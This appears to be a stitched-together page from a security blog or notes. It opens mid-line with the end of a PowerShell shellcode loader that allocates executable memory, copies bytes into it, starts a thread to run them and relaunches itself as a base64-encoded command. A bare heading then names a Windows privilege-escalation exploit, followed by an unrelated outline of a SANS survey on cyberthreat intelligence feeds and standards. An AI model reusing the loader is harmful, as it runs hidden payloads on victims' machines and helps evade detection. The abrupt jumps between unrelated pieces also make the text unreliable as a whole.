$z.Length};$NNL=$w::VirtualAlloc(0,0×1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($NNL.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$NNL,0,0,0);for (;;){Start-sleep 60};’;$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($mcBY));$03F = “-EncodedCommand “;if([IntPtr]::Size -eq 8){$914J = $env:SystemRoot + “\syswow64\WindowsPowerShell\v1.0\powershell”;iex “& $914J $03F $e”}else{;iex “& powershell $03F $e”;}

III. Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu):

SANS: Who’s Using Cyberthreat Intelligence and How?

“Who’s Using Cyberthreat Intelligence and How?” By Dave Shackleford 


[Source: http://www.sans.org/reading-room/whitepapers/analyst/cyberthreat-intelligence-how-35767]


Outline:
Threat Intelligence – the set of data collected, assessed and applied regarding security threats, threat actors, exploits, malware, vulnerabilities and compromise indicators

Purpose of CTI:
• Ability to see attacks in context
• Accuracy of detection and response
• Faster detection and response 

Data Collection Points:
“In addition to the 59% stating they are gathering intelligence from their internal systems, 76% of respondents say their organizations are gathering intelligence from the security community at large.

The external sources they are gathering information from include: • 56% gather intelligence from their vendor product’s CTI feeds • 54% gather intelligence from their public CTI feeds • 53% gather intelligence from open source feeds

A small number of answers in the “Other” category included private feeds for government agencies and law enforcement, as well as social media and sites such as the SANS Internet Storm Center (ISC). “

Intelligence Feeds
“We asked those who selected “vendor-driven CTI feeds” what types of vendors were providing these. The range of responses was very broad, and many teams are obviously using CTI data from a number of different types of vendors. Endpoint security vendors led with 51%, but 43% of respondents are also getting CTI information from unified threat management (UTM)/firewall/IDS vendors and 40% from CTI platform vendors, vulnerability management providers and SIEM vendors. “

Planning for CTI
Organizations planning to invest in CTI feeds, tools and internal capabilities should assess their readiness for using CTI now and in the future.

1. Decide what you intend to do with CTI data and to whom you will assign to CTI planning duties. Most organizations that attempt to implement CTI ad hoc, with no budget, staff, tools or goals, tend to reap minimal rewards.

2. Focus on tools and feeds. Once you’ve decided what you plan to do with CTI (improve detection capabilities, add more granular correlation rules to your SIEM, add host-based forensics indicators, etc.), focus on two areas: What kinds of tools will you use to aggregate and collect CTI data? And will you use commercial feeds, open source and community data, or both? Many SIEM providers are now integrating CTI feeds and information readily. Be sure to look at standard import data formats if you are bringing in feeds.

3. Consider your goals. Once you’ve decided on the basics of what data you want and where it will be aggregated, think about the short- and long-term goals of the program and how you’ll measure progress. 

CTI Standards and Tools
CVE and CVSS
• Open Threat Exchange (OTX)—51%
• Structured Threat Information Expression (STIX)—46%
• Collective Intelligence Framework (CIF)—39%
• Open Indicators of Compromise (OpenIOC) framework—33%
• Trusted Automated eXchange of Indicator Information (TAXII)—33%
• Traffic Light Protocol (TLP)—28%
• Cyber Observable eXpression (CybOX)—26%
• Incident Object Description and Exchange Format (IODEF)—23%
• Vocabulary for Event Recording and Incident Sharing (VERIS)—20%